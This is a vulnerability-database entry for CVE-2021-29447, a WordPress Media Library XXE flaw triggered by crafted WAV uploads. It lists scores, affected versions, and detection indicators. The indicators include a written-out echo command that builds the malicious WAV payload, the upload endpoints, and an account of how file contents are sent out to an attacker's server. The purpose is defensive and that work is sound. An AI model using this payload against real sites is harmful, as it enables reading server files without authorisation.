cbcvebase.
CVE-2021-29447
published 2021-04-15

CVE-2021-29447: Wordpress is an open source CMS. A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE…

PriorityP267medium6.5CVSS 3.1
AVNACLPRLUINSUCHINAN
EXPLOIT
EPSS
85.72%
99.7th percentile
Wordpress is an open source CMS. A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. This requires WordPress installation to be using PHP 8. Access to internal files is possible in a successful XXE attack. This has been patched in WordPress version 5.7.1, along with the older affected versions via a minor release. We strongly recommend you keep auto-updates enabled.

Affected

9 ranges
VendorProductVersion rangeFixed in
debiandebian_linux
debiandebian_linux
debianwordpress< wordpress 5.7.1+dfsg1-1 (bookworm)wordpress 5.7.1+dfsg1-1 (bookworm)
wordpresswordpress>= 0 < 5.7.1+dfsg1-15.7.1+dfsg1-1
wordpresswordpress>= 0 < 5.7.1+dfsg1-15.7.1+dfsg1-1
wordpresswordpress>= 0 < 5.7.1+dfsg1-15.7.1+dfsg1-1
wordpresswordpress>= 0 < 5.7.1+dfsg1-15.7.1+dfsg1-1
wordpresswordpress>= 5.6.0 < 5.7.15.7.1
wordpresswordpress-develop

Detection & IOCsextracted from sources · hover to see the quote

filenamepayload.wav
path/wp-admin/async-upload.php
path/wp-admin/media-new.php
path/wp-login.php
filenamemalicious.wav
commandecho -en "RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00%remote;%init;%trick;]>\x00" > payload.wav
bytes
RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00
  • Malicious WAV file crafted for XXE exploitation begins with RIFF header followed by iXML chunk containing XML DTD entity declarations (%remote;%init;%trick;). Detect uploads of WAV files to WordPress Media Library where the iXML chunk contains DOCTYPE or ENTITY declarations.
  • Exploit uploads a malicious WAV file to /wp-admin/async-upload.php with action=upload-attachment. Monitor POST requests to this endpoint from Author-level (or higher) authenticated users uploading audio/WAV MIME-type files containing XML entity payloads.
  • The XXE payload causes the WordPress server to make an outbound HTTP GET request to an attacker-controlled server fetching a DTD file, then a second GET request exfiltrating base64+zlib-encoded file contents as a URL query parameter (?p=<data>). Monitor for outbound HTTP GET requests from the web server process with a ?p= parameter containing large base64 strings.
  • The exploit retrieves a _wpnonce value from /wp-admin/media-new.php before uploading. Anomalous scraping of media-new.php followed immediately by a WAV file upload to async-upload.php from the same session is a strong behavioral indicator.
  • Exploit targets WordPress versions 5.6–5.7 running PHP 8. Correlate WordPress version header/generator tag with PHP version in server responses to identify vulnerable instances.
  • Exfiltrated data arrives at the attacker HTTP server as a base64url-encoded, zlib-compressed string in the ?p= query parameter of a GET request. A WAF or proxy rule matching GET requests with ?p= values longer than ~100 characters originating from the WordPress server process can detect active exploitation.
  • ·Exploitation requires the WordPress installation to be running PHP 8; the XXE via iXML WAV parsing is not triggered on PHP 7.
  • ·The attacker must be an authenticated WordPress user with file upload capability (e.g., Author role or higher); unauthenticated exploitation is not possible.
  • ·The exploit requires the attacker to host an external DTD file on a server reachable from the WordPress host (outbound HTTP from the target to attacker-controlled infrastructure is required for the XXE chain to complete).

CVSS provenance

nvdv3.16.5MEDIUMCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
nvdv2.04.0MEDIUMAV:N/AC:L/Au:S/C:P/I:N/A:N
osv6.5MEDIUM
vendor_debian7.1LOW
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.